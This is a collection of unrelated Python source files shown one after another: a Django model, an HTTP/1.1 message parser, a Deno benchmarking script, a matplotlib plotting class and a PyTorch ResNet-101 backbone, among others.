event = self._make_event(event=EVENT_INPUT)
event.size = len(message)
mq.send(event)
def _send_batch_event(self, elapse, text, error):
event = self._make_event(event=EVENT_BATCH)
event.elapse = elapse
event.text = text
event.error = error
mq.send(event)
def _send_login_event(self):
event = self._make_event(event=EVENT_LOGIN)
mq.send(event)
def _send_logout_event(self):
event = self._make_event(event=EVENT_LOGOUT)
mq.send(event)
|
from __future__ import unicode_literals
from django.db import models
from authentication.models import Account
class Post(models.Model):
id = models.AutoField(primary_key=True)
author = models.ForeignKey(Account)
barcode = models.TextField()
latitud = models.TextField()
longitud = models.TextField()
timestamp = models.TextField()
created_at = models.DateField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __unicode__(self):
return '{0}'.format(self.barcode)
|
# Copyright 2020 John Dorn
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file implements concepts from the HTTP/1.1 specification
# (RFC 2616, https://www.ietf.org/rfc/rfc2616.txt)
class ParseError(Exception):
""" Raised on parsing failure. """
pass
class HTTPVersion:
""" Representation of an HTTP protocol version, eg. HTTP/1.1 """
@staticmethod
def parse(string):
""" Parse an HTTP version string into major and minor parts.
string: str -- string representation of HTTP version
eg. 'HTTP/1.1' --> HTTPVersion(1, 1)
Returns new HTTPVersion(major, minor)
Raises ValueError if the format is invalid.
"""
# Separate out the major and minor versions
if not string.startswith('HTTP/'): raise ValueError()
parts = string[len('HTTP/'):].split('.')
if len(parts) != 2: raise ValueError()
# Convert them to integers
return HTTPVersion(*map(int, parts))
def __init__(self, major, minor):
""" Create representation of HTTP version {major}.{minor}.
major: int -- major component of version
minor: int -- minor component of version
Raises ValueError if either component is negative.
"""
if major < 0 or minor < 0: raise ValueError()
self.major = major
self.minor = minor
def __eq__(self, other):
return (isinstance(other, HTTPVersion)
and self.major == other.major
and self.minor == other.minor)
def __str__(self):
return 'HTTP/' + str(self.major) + '.' + str(self.minor)
def __bytes__(self):
return bytes(str(self), encoding='ascii')
def __repr__(self):
return 'HTTPVersion(' + str(self.major) + ', ' + str(self.minor) + ')'
class Message:
""" Abstract class for functionality shared
between Request and Response.
"""
@staticmethod
def read_headers_from(lines):
""" Reads and parses a block of headers from an iterable of lines.
Returns dict mapping header names (str) to values (str).
Raises ParseError on parsing error.
"""
headers = dict()
last_header = None
while True:
# Get the next line
headerLine = next(lines)
# Stop at end of headers
if len(headerLine.strip()) == 0: return headers
if headerLine.startswith(' ') or headerLine.startswith('\t'):
# Merge continuation lines with the current header's value
if last_header is None: raise self.ParseError()
headers[last_header] += ' ' + headerLine.strip()
else:
# Separate header into name and value
parts = headerLine.split(':', 1)
if len(parts) != 2: raise self.ParseError()
last_header, value = parts
if last_header in headers:
# Merge values of duplicate headers
headers[last_header] += ',' + value.strip()
else:
# Create an entirely new header
headers[last_header] = value.strip()
def __init__(self, ver=None, headers=None, body=None):
""" Initialize data shared between request and response.
ver: HTTPVersion -- HTTPVersion specified by response;
defaults to HTTP/1.1
headers: dict -- headers of the response; defaults to empty dict
body: bytes -- body content of the response; defaults to empty
"""
assert ver is None or isinstance(ver, HTTPVersion)
assert headers is None or isinstance(headers, dict)
assert body is None or isinstance(body, bytes)
self.ver = ver or HTTPVersion(1, 1)
self.headers = headers or dict()
self.body = body or b''
def attach_header(self, header, value):
""" Attach a header to an existing request.
header: str -- header name
value: str -- header value
If the header already exists, it will be merged with the new value.
"""
if header in self.headers.keys():
self.headers[header] += ', ' + value
else:
self.headers[header] = value
def _message_line(self):
""" Generates the "message line": the first line of the message.
Must be implemented by concrete subclasses.
"""
raise NotImplementedError()
def __bytes__(self):
return (bytes(self._message_line() + '\r\n'
+ '\r\n'.join('{}: {}'.format(k, v)
for k, v in self.headers.items())
+ '\r\n\r\n', encoding='ascii')
+ self.body)
def __str__(self):
return (self._message_line() + '\n'
+ '\n'.join('{}: {}'.format(k, v)
for k, v in self.headers.items())
+ '\n\n'
+ str(self.body))
class Request(Message):
""" An HTTP request. """
@staticmethod
def read_from(lines):
""" Reads and parses a request message from an iterable of lines.
Returns a Request object.
Raises ParseError if the request cannot be parsed.
If the version is not HTTP/1.1, the headers will not be
parsed, since their format is not known.
Request bodies will be ignored.
"""
# Read and parse the request line
method, path, version = Request._read_reqline(lines)
# Stop early if the version is unsupported
if version != HTTPVersion(1, 1): return
# Read and parse the headers
headers = Message.read_headers_from(lines)
# Build a Request object
return Request(method, path, version, headers=headers)
@staticmethod
def _read_reqline(lines):
""" Reads and parses a request line (the first line of a request)
from an iterable of lines.
Empty lines before the request line will be consumed.
Returns (method: str, path: str, ver: HTTPVersion)
Raises ParseError if the request line cannot be parsed.
"""
# Get the first non-blank line
requestLine = ''
while not requestLine:
requestLine = next(lines)
# Split into url, path, http version
parts = requestLine.split(' ')
if len(parts) != 3: raise self.ParseError()
method, path, ver_string = parts
# Parse the http version
ver = HTTPVersion.parse(ver_string)
return method, path, ver
def __init__(self, method, path, ver=None, headers=None, body=None):
""" Create an HTTP request.
method: str -- HTTP method
path: str -- request path
ver: HTTPVersion -- HTTP version specified by request;
defaults to HTTP/1.1
headers: dict -- headers of the request; defaults to empty dict
body: str -- body content of the response; defaults to empty str
"""
assert isinstance(method, str)
assert isinstance(path, str)
super().__init__(ver, headers, body)
self.method = method
self.path = path
def _message_line(self):
return '{} {} {}'.format(self.method, self.path, self.ver)
class Response(Message):
""" An HTTP response. """
OK = 200
MOVED_PERMANENTLY = 301
BAD_REQUEST = 400
NOT_FOUND = 404
METHOD_NOT_ALLOWED = 405
INTERNAL_SERVER_ERROR = 500
VERSION_NOT_SUPPORTED = 505
STATUS_MESSAGES = {
OK: 'OK',
MOVED_PERMANENTLY: 'Moved Permanently',
BAD_REQUEST: 'Bad Request',
NOT_FOUND: 'Not Found',
METHOD_NOT_ALLOWED: 'Method Not Allowed',
INTERNAL_SERVER_ERROR: 'Internal Server Error',
VERSION_NOT_SUPPORTED: 'HTTP Version Not Supported'
}
def __init__(self, code, ver=None, headers=None, body=None):
""" Create an HTTP response.
code: int -- status code
ver: HTTPVersion -- HTTPVersion specified by response;
defaults to HTTP/1.1
headers: dict -- headers of the response; defaults to empty dict
body: str -- body content of the response; defaults to empty str
"""
assert isinstance(code, int)
super().__init__(ver, headers, body)
self.code = code
def status_message(self):
return self.STATUS_MESSAGES[self.code]
def _message_line(self):
return '{} {} {}'.format(self.ver, self.code, self.status_message())
def guess_content_type(filename):
""" Return a content-type for a filename based on its suffix.
This implementation only supports '.html' and '.css' as suffixes.
"""
if filename.endswith('.html'):
return 'text/html'
elif filename.endswith('.css'):
return 'text/css'
else:
return 'text/plain'
|
from .taxonerd import TaxoNERD
from .cli import *
__version__ = "1.3.0"
|
#!/usr/bin/env python
# Copyright 2018-2020 the Deno authors. All rights reserved. MIT license.
# Performs benchmark and append data to //website/data.json.
# If //website/data.json doesn't exist, this script tries to import it from
# gh-pages branch.
# To view the results locally run ./tools/http_server.py and visit
# http://localhost:4545/website
import os
import sys
import json
import time
import tempfile
import subprocess
from util import build_path, executable_suffix, root_path, run, run_output
import third_party
from http_benchmark import http_benchmark
import throughput_benchmark
import http_server
# The list of the tuples of the benchmark name and arguments
exec_time_benchmarks = [
("hello", ["cli/tests/002_hello.ts"]),
("relative_import", ["cli/tests/003_relative_import.ts"]),
("error_001", ["cli/tests/error_001.ts"]),
("cold_hello", ["--reload", "cli/tests/002_hello.ts"]),
("cold_relative_import", ["--reload", "cli/tests/003_relative_import.ts"]),
("workers_startup", ["cli/tests/workers_startup_bench.ts"]),
("workers_round_robin", ["cli/tests/workers_round_robin_bench.ts"]),
("text_decoder", ["cli/tests/text_decoder_perf.js"]),
("text_encoder", ["cli/tests/text_encoder_perf.js"]),
]
def read_json(filename):
with open(filename) as json_file:
return json.load(json_file)
def write_json(filename, data):
with open(filename, 'w') as outfile:
json.dump(data, outfile)
def get_binary_sizes(build_dir):
sizes = {}
mtimes = {}
# The deno executable should be located at the root of the build tree.
deno_exe = os.path.join(build_dir, "deno" + executable_suffix)
sizes["deno"] = os.path.getsize(deno_exe)
# Because cargo's OUT_DIR is not predictable, search the build tree for
# snapshot related files.
for parent_dir, _, file_names in os.walk(build_dir):
for file_name in file_names:
if not file_name in [
"CLI_SNAPSHOT.bin",
"CLI_SNAPSHOT.js",
"CLI_SNAPSHOT.js.map",
"COMPILER_SNAPSHOT.bin",
"COMPILER_SNAPSHOT.js",
"COMPILER_SNAPSHOT.js.map",
]:
continue
file_path = os.path.join(parent_dir, file_name)
file_mtime = os.path.getmtime(file_path)
# If multiple copies of a file are found, use the most recent one.
if file_name in mtimes and mtimes[file_name] > file_mtime:
continue
mtimes[file_name] = file_mtime
sizes[file_name] = os.path.getsize(file_path)
return sizes
def get_strace_summary_text(test_args):
f = tempfile.NamedTemporaryFile()
cmd = ["strace", "-c", "-f", "-o", f.name] + test_args
try:
subprocess.check_output(cmd)
except subprocess.CalledProcessError:
pass
return f.read()
def strace_parse(summary_text):
summary = {}
# clear empty lines
lines = list(filter(lambda x: x and x != "\n", summary_text.split("\n")))
# Filter out non-relevant lines. See the error log at
# https://github.com/denoland/deno/pull/3715/checks?check_run_id=397365887
# This is checked in tools/testdata/strace_summary2.out
lines = [x for x in lines if x.find("detached ...") == -1]
if len(lines) < 4:
return {} # malformed summary
lines, total_line = lines[2:-2], lines[-1]
# data to dict for each line
for line in lines:
syscall_fields = line.split()
syscall_name = syscall_fields[-1]
syscall_dict = {}
if 5 <= len(syscall_fields) <= 6:
syscall_dict = {
"% time": float(syscall_fields[0]),
"seconds": float(syscall_fields[1]),
"usecs/call": int(syscall_fields[2]),
"calls": int(syscall_fields[3])
}
syscall_dict["errors"] = 0 if len(syscall_fields) < 6 else int(
syscall_fields[4])
summary[syscall_name] = syscall_dict
# record overall (total) data
total_fields = total_line.split()
summary["total"] = {
"% time": float(total_fields[0]),
"seconds": float(total_fields[1]),
"calls": int(total_fields[2]),
"errors": int(total_fields[3])
}
return summary
def get_strace_summary(test_args):
s = get_strace_summary_text(test_args)
try:
return strace_parse(s)
except ValueError:
print "error parsing strace"
print "----- <strace> -------"
print s
print "----- </strace> ------"
def run_throughput(deno_exe):
m = {}
m["100M_tcp"] = throughput_benchmark.tcp(deno_exe, 100)
m["100M_cat"] = throughput_benchmark.cat(deno_exe, 100)
m["10M_tcp"] = throughput_benchmark.tcp(deno_exe, 10)
m["10M_cat"] = throughput_benchmark.cat(deno_exe, 10)
return m
# "thread_count" and "syscall_count" are both calculated here.
def run_strace_benchmarks(deno_exe, new_data):
thread_count = {}
syscall_count = {}
for (name, args) in exec_time_benchmarks:
s = get_strace_summary([deno_exe] + args)
thread_count[name] = s["clone"]["calls"] + 1
syscall_count[name] = s["total"]["calls"]
new_data["thread_count"] = thread_count
new_data["syscall_count"] = syscall_count
# Takes the output from "/usr/bin/time -v" as input and extracts the 'maximum
# resident set size' and returns it in bytes.
def find_max_mem_in_bytes(time_v_output):
for line in time_v_output.split('\n'):
if 'maximum resident set size (kbytes)' in line.lower():
_, value = line.split(': ')
return int(value) * 1024
def run_max_mem_benchmark(deno_exe):
results = {}
for (name, args) in exec_time_benchmarks:
cmd = ["/usr/bin/time", "-v", deno_exe] + args
try:
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError:
pass
mem = find_max_mem_in_bytes(out)
results[name] = mem
return results
def run_exec_time(deno_exe, build_dir):
hyperfine_exe = third_party.get_prebuilt_tool_path("hyperfine")
benchmark_file = os.path.join(build_dir, "hyperfine_results.json")
run([
hyperfine_exe, "--ignore-failure", "--export-json", benchmark_file,
"--warmup", "3"
] + [
deno_exe + " " + " ".join(args) for [_, args] in exec_time_benchmarks
])
hyperfine_results = read_json(benchmark_file)
results = {}
for [[name, _], data] in zip(exec_time_benchmarks,
hyperfine_results["results"]):
results[name] = {
"mean": data["mean"],
"stddev": data["stddev"],
"user": data["user"],
"system": data["system"],
"min": data["min"],
"max": data["max"]
}
return results
def run_http(build_dir, new_data):
stats = http_benchmark(build_dir)
new_data["req_per_sec"] = {k: v["req_per_sec"] for k, v in stats.items()}
new_data["max_latency"] = {k: v["max_latency"] for k, v in stats.items()}
def bundle_benchmark(deno_exe):
bundles = {
"file_server": "./std/http/file_server.ts",
"gist": "./std/examples/gist.ts",
}
sizes = {}
for name, url in bundles.items():
# bundle
path = name + ".bundle.js"
run([deno_exe, "bundle", url, path])
# get size of bundle
assert os.path.exists(path)
sizes[name] = os.path.getsize(path)
# remove bundle
os.remove(path)
return sizes
def main():
build_dir = build_path()
sha1 = run_output(["git", "rev-parse", "HEAD"],
exit_on_fail=True).out.strip()
http_server.spawn()
deno_exe = os.path.join(build_dir, "deno")
os.chdir(root_path)
new_data = {
"created_at": time.strftime("%Y-%m-%dT%H:%M:%SZ"),
"sha1": sha1,
}
# TODO(ry) The "benchmark" benchmark should actually be called "exec_time".
# When this is changed, the historical data in gh-pages branch needs to be
# changed too.
new_data["benchmark"] = run_exec_time(deno_exe, build_dir)
new_data["binary_size"] = get_binary_sizes(build_dir)
new_data["bundle_size"] = bundle_benchmark(deno_exe)
# Cannot run throughput benchmark on windows because they don't have nc or
# pipe.
if os.name != 'nt':
new_data["throughput"] = run_throughput(deno_exe)
run_http(build_dir, new_data)
if "linux" in sys.platform:
run_strace_benchmarks(deno_exe, new_data)
new_data["max_memory"] = run_max_mem_benchmark(deno_exe)
print "===== <BENCHMARK RESULTS>"
print json.dumps(new_data, indent=2)
print "===== </BENCHMARK RESULTS>"
write_json(os.path.join(build_dir, "bench.json"), new_data)
if __name__ == '__main__':
main()
|
import matplotlib.pyplot as plt
class SignChangeSparseMap:
def __init__(self):
self.x_plus = []
self.x_minus = []
self.y_plus = []
self.y_minus = []
def add_right_change(self, x, y):
self.x_plus.append([x, y])
def add_left_change(self, x, y):
self.x_minus.append([x, y])
def add_up_change(self, x, y):
self.y_plus.append([x, y])
def add_down_change(self, x, y):
self.y_minus.append([x, y])
def to_dict(self):
return {
'__sign_change_sparse_map__': True,
'x_plus': self.x_plus,
'x_minus': self.x_minus,
'y_plus': self.y_plus,
'y_minus': self.y_minus,
}
@staticmethod
def from_dict(dict):
if '__sign_change_sparse_map__' not in dict:
raise RuntimeError('not a SignChangeSparseMap dict')
restored_sparse_map = SignChangeSparseMap()
restored_sparse_map.x_plus = dict['x_plus']
restored_sparse_map.x_minus = dict['x_minus']
restored_sparse_map.y_plus = dict['y_plus']
restored_sparse_map.y_minus = dict['y_minus']
return restored_sparse_map
def plot(self, save_path=""):
[xs, ys] = [[i for i, j in self.x_plus], [j for i, j in self.x_plus]]
plt.plot(xs, ys, 'y.')
[xs, ys] = [[i for i, j in self.x_minus], [j for i, j in self.x_minus]]
plt.plot(xs, ys, 'r.')
[xs, ys] = [[i for i, j in self.y_plus], [j for i, j in self.y_plus]]
plt.plot(xs, ys, 'g.')
[xs, ys] = [[i for i, j in self.y_minus], [j for i, j in self.y_minus]]
plt.plot(xs, ys, 'b.')
plt.xlabel('x')
plt.ylabel('y')
if save_path:
plt.savefig(save_path)
else:
plt.show()
|
# -*- coding: utf-8 -*-
"""
@Time : 2019/3/3 19:55
@Author : Wang Xin
@Email : wangxin_buaa@163.com
"""
import torch
import torch.nn as nn
from torch.nn import BatchNorm2d
import torchvision.models.resnet
affine_par = True
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None, fist_dilation=1, multi_grid=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=dilation * multi_grid, dilation=dilation * multi_grid, bias=False)
self.bn2 = BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=False)
self.relu_inplace = nn.ReLU(inplace=True)
self.downsample = downsample
self.dilation = dilation
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out = out + residual
out = self.relu_inplace(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers):
self.inplanes = 128
super(ResNet, self).__init__()
self.conv1 = conv3x3(3, 64, stride=2)
self.bn1 = BatchNorm2d(64)
self.relu1 = nn.ReLU(inplace=False)
self.conv2 = conv3x3(64, 64)
self.bn2 = BatchNorm2d(64)
self.relu2 = nn.ReLU(inplace=False)
self.conv3 = conv3x3(64, 128)
self.bn3 = BatchNorm2d(128)
self.relu3 = nn.ReLU(inplace=False)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.relu = nn.ReLU(inplace=False)
# self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1, ceil_mode=True) # change
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=1, dilation=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=1, dilation=4, multi_grid=(1, 1, 1))
def _make_layer(self, block, planes, blocks, stride=1, dilation=1, multi_grid=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
BatchNorm2d(planes * block.expansion, affine=affine_par))
layers = []
generate_multi_grid = lambda index, grids: grids[index % len(grids)] if isinstance(grids, tuple) else 1
layers.append(block(self.inplanes, planes, stride, dilation=dilation, downsample=downsample,
multi_grid=generate_multi_grid(0, multi_grid)))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(
block(self.inplanes, planes, dilation=dilation, multi_grid=generate_multi_grid(i, multi_grid)))
return nn.Sequential(*layers)
def forward(self, x):
x = self.relu1(self.bn1(self.conv1(x)))
x = self.relu2(self.bn2(self.conv2(x)))
x = self.relu3(self.bn3(self.conv3(x)))
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
return x
def freeze(self):
for m in self.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
def resnet101(pretrained=True):
resnet101 = ResNet(Bottleneck, [3, 4, 23, 3])
if pretrained:
# saved_state_dict = torch.load('./network/pretrained_models/resnet101-imagenet.pth')
saved_state_dict = torch.load('/home/dahai/hackthon/DORN_pytorch/pretrained_models/resnet101-imagenet.pth')
new_params = resnet101.state_dict().copy()
for i in saved_state_dict:
i_parts = i.split('.')
if not i_parts[0] == 'fc':
new_params['.'.join(i_parts[0:])] = saved_state_dict[i]
resnet101.load_state_dict(new_params)
print(
"++++++++++++++++++++++++++++++++ Pre-trained Model Loaded ++++++++++++++++++++++++++++++++++++++")
return resnet101
if __name__ == "__main__":
model = resnet101(pretrained=True)
model = model.cuda()
model.eval()
image = torch.randn(1, 3, 720, 1280)
image = image.cuda()
with torch.no_grad():
out0, out1 = model(image)
print('out0 size:', out0.size())
print('out1 size:', out1.size())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.